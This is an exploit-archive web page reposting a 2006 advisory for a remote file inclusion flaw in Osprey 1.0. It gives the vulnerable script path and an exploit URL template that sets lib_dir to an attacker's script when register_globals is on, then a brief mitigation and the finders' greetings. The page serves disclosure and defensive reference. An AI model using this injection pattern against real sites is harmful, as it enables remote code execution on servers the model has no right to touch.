Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Osprey - exploit.company
header-logo
Suggest Exploit
vendor:
osprey
by:
Kw3[R]Ln
N/A
CVSS
N/A
Remote File Include
CWE
Product Name: osprey
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

Osprey <= 1.0 [lib_dir] Remote File Include Vulnerability

Variable $lib_dir not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script. The exploit URL is http://www.site.com/[path]/web/lib/xml/oai/GetRecord.php?lib_dir=[Evil_Script]

Mitigation:

Ensure that register_globals is turned off and properly sanitize user input
Source

Exploit-DB raw data:

---------------------------------------------------------------------------
Osprey <= 1.0 [lib_dir] Remote File Include Vulnerability
---------------------------------------------------------------------------


Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : osprey
version : 1.0
URL : http://osprey.ibiblio.org/download/osprey-1.0.tar.bz2
Description: Osprey is a peer-to-peer enabled content distribution system. A metadata management system for software and document collections enables local and distributed searching of materials. Items are available for download directly via URL or indirectly via the BitTorrent peer-to-peer protocol.
------------------------------------------------------------------


Exploit:
~~~~~~~
Variable $lib_dir not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/web/lib/xml/oai/GetRecord.php?lib_dir=[Evil_Script]
---------------------------------------------------------------------------

Shoutz:
~~~~~~

# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RST-CREW.NET
__/*

# milw0rm.com [2006-10-16]

Navigation

Suggest Exploit

Services By CQR